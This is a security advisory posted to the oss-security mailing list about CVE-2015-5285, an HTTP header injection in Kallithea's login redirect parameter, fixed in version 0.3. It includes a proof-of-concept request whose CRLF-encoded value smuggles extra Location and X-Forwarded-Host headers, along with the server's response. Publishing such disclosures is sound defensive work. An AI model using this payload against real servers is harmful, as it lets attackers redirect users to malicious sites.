Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 2 Oct 2015 22:13:01 +0200
From: Andrew Shadura <andrew@...dura.me>
To: oss-security@...ts.openwall.com
Subject: CVE-2015-5285: Kallithea: HTTP header injection

HTTP header injection

Synopsis
========

A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.

Description
===========

HTTP header injection was possible in login-related code of Kallithea,
allowing
attackers to inject arbitrary headers into the server responses.

The vulnerability affects the `came_from` `GET` parameter.

Example of a malicious request:

    GET
/_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk
HTTP/1.1
    Host: 192.168.0.28:8080
    Content-Length: 0
    Cache-Control: max-age=0
    Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://192.168.0.28:8080
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8
    Cookie:
kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

    HTTP/1.1 302 Found
    Cache-Control: no-cache
    Content-Length: 411
    Content-Type: text/html; charset=UTF-8
    Date: Mon, 21 Sep 2015 13:58:05 GMT
    Location: http://192.168.0.28:8080/_admin/d47b5
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk
    Pragma: no-cache
    Server: waitress

    <html>
     <head>
      <title>302 Found</title>
     </head>
     <body>
      <h1>302 Found</h1>
      The resource was found at <a href="http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk </a>;
    you should be redirected automatically.


     </body>
    </html>

Impact
======

The bug allows an attacker to override important response headers,
possibly redirecting users
to a malicious website or make other middleware misbehave when it trusts
the response headers.

Resolution
==========

The Kallithea project has fixed this issue in the stable branch. Users
are recommended to
upgrade to the latest 0.3 release.

Affected versions
=================

The issue is present in Kallithea versions before 0.3.

Acknowledgments
===============

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References
==========

[0] Kallithea Project
    <https://kallithea-scm.org/>

[1] CVE-2015-5285
    <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>

[2] Kallithea: Security Notice CVE-2015-5285
    <https://kallithea-scm.org/security/cve-2015-5285.html>

[3] Mercurial changeset fixing the issue

<https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>

[4] Zero Science Lab
    <http://www.zeroscience.mk/en/>

-- 
Cheers,
  Andrew Shadura
  on behalf of Kallithea Security Team


Download attachment "signature.asc" of type "application/pgp-signature" (474 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.